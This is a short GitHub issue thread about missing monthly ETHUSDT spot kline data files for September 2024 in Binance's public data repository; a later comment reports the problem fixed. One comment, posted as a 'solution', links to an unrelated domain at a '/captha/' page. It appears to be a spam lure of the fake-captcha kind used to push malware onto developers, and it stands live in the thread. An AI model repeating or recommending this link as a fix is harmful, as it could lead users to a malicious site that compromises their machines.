### ISSUE TITLE
MISSING KLINE for monthly ETHUSDT 2024-09 spot market

### ISSUE THREAD

**Issue by baoutch** [binance/binance-public-data#362]
In all timeframes monthly klines are non existent for ETHUSDT in september 2024

For instance : https://data.binance.vision/data/spot/monthly/klines/ETHUSDT/1h/ETHUSDT-1h-2024-09.zip

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by alplabin** [comment]
It has been fixed.
